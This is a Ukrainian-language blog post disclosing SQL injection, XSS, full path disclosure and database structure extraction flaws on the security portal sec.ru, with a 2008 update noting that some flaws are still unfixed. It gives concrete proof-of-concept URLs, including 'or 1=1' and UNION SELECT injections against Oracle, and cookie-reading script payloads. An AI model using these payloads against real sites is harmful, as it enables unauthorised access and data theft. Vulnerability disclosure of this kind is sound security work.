Уразливості на www.sec.ru
20:05 06.12.200816.07.2007
У січні, 20.01.2007, я знайшов SQL Injection, Cross-Site Scripting, Full path disclosure і SQL DB Structure Extraction уразливості на популярному проекті http://www.sec.ru - інтернет-порталі по безпеці. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
06.12.2008
SQL Injection:
http://www.sec.ru/reviewsmgr.cfm?act=1&rid=-1%20or%201=1
http://www.sec.ru/reviewsmgr.cfm?act=1&rid=-1%20union%20SELECT%20banner,null%20FROM%20v$version
На сервері використовується Oracle9i Enterprise Edition Release 9.2.0.6.0.
XSS:
- alert(document.cookie) (вже виправлена)
- alert(document.cookie)
- цікавий
- html включення
Full path disclosure:
http://www.sec.ru/reviewsmgr.cfm?act=1&rid=
SQL DB Structure Extraction:
http://www.sec.ru/reviewsmgr.cfm?act=1&rid=
Якщо одна XSS та Full path disclosure і SQL DB Structure Extraction уразливості вже виправлені, то SQL Injection та друга XSS досі не виправлені.